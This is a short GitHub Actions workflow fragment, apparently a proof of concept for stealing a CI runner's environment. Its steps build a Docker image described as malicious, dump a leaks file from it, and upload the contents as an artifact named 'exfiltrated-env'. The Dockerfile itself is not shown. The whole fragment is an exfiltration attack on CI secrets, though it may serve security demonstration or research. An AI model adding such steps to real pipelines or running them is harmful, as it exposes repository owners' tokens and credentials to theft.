- name: Build malicious image
  run: docker build -t leak .

- name: Run container and exfiltrate environment
  run: docker run --rm leak cat /leaks.txt > leaked_env.txt

- name: Upload exfiltrated environment
  uses: actions/upload-artifact@v3
  with:
    name: exfiltrated-env
    path: leaked_env.txt
